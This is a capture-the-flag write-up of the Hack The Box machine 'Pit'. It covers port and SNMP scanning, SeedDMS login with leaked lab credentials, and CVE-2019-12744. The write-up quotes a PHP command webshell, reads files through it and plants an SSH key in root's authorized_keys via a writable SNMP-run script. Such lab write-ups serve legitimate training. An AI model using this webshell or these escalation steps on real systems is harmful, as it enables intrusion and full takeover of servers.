> For the complete documentation index, see [llms.txt](https://0xa1mn.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xa1mn.gitbook.io/writeups/hack-the-box-htb/linux/pit.md).

# PIT

## Scanning

**NMAP**

* TCP

```
➜  ~ nmap -T4 -p- -A pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 12:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
```

*add `dms-pit.htb` to hosts file*

* UPD

  after a while i realize no way to start attack on TCP ports so go for UPD scan

```
➜  ~ sudo nmap -T5 -sU --top-ports 4 pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.22s latency).

PORT    STATE         SERVICE
123/udp filtered      ntp
137/udp filtered      netbios-ns
161/udp open|filtered snmp
631/udp filtered      ipp

Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds
```

`161/udp open|filtered snmp` it the way

## Enumeration

![](/files/-Mjja_SCCUaYdBYGOmtE)

`cat 10.10.10.241.snmp`

![](/files/-MjjadeSSWdr9ydZiUrP)

We find this directory `/seeddms51x/seeddms`

![](/files/-MjjagmYS6KeUyRzai_2)

i tried some default credentials but nothing ...

back to SNMP file searching for Credintials

![](/files/-MjjakZ9TpS3JX6N-4_I)

after some tries credentials `michelle:michelle`

![](/files/-MjjamcVvfwyTHj6omYh)

## Exploit

![](/files/-MjjaqbEhqBh6pxsJaIR)

now we know the version of DMS `seedDMS 5.1.15`

![](/files/-MjjaubpUao3UtCE-HqS)

**exploit**

```
➜  ~ cat 47022.txt 
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
```

create backdoor

![](/files/-Mjjazf40rG3oFPmrehL)

in this directory `DMS /Docs /Users /Michelle /`

![](/files/-Mjjb5-nF_QD-Y-oebfk)

upload shell.php as `1.php` **step 3**

![](/files/-Mjjb8OQNj8nDapR8f6P)

`documentid=30` check yours ...

![](/files/-MjjbBwVIB5nMtOqqdMs)

**step 4**

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20/etc/passwd`

![](/files/-MjjbGCuBL3sXK1krUuA)

shadow not accessible

reverse shell not working

i tried **Path Traversal** to access DB credentials it work

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20../../../conf/settings.xml`

![](/files/-MjjbQLK_2wmMrumEJYX)

inspect this page

search username

![](/files/-MjjbTSjAQ3GhifLUvFf)

lets use this credentials to login main App

after some tries Credentials `michelle:ied^ieY6xoquu`

![](/files/-MjjbW_2T5tRqVYmKXH-)

WE IIIIIIIIIIIIIIIIIN 🎉

![](/files/-MjjbhhAMgN_ORckYu3Z)

and Terminal tap calls us

![](/files/-MjjbjpGWqbQ8x7D3Qtl)

* [x] USER FLAG

## Privilege Escalation

from snmp enum we find this

![](/files/-Mjjbovq5YuBsz0vQUKh)

![](/files/-MjjbsMlB5Jc_h6GAz3A)

can't access this dir

![](/files/-MjjbuNqvDKpEeHGZiFB)

lets check permission on this dir

![](/files/-Mjjby0dGJZXwt8aGpld)

`michelle -wx` we can write and execute

Lets create a SSH payload with out public key and put it into the /usr/local/monitoring directory

on attacker machine

![](/files/-Mjjc-YCF-6DHGDQO6Z2)

after creating the key place it in this payload and save

```
echo "your-public-ssh-key" > /root/.ssh/authorized_keys
```

![](/files/-Mjjc5iAFcdaCgtUavHE)

save as **check.sh**

start local server

![](/files/-MjjcBVCBmKJCbLht8_K)

![](/files/-MjjcExOLeTv1FW7d7Jd)

```
➜  ~ snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
```

this line to execute script check [this](https://www.dpstele.com/snmp/what-does-oid-network-elements.php)

![](/files/-MjjcJ-Eo86xpjVD9JMF)

* [x] ROOT FLAG


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://0xa1mn.gitbook.io/writeups/hack-the-box-htb/linux/pit.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
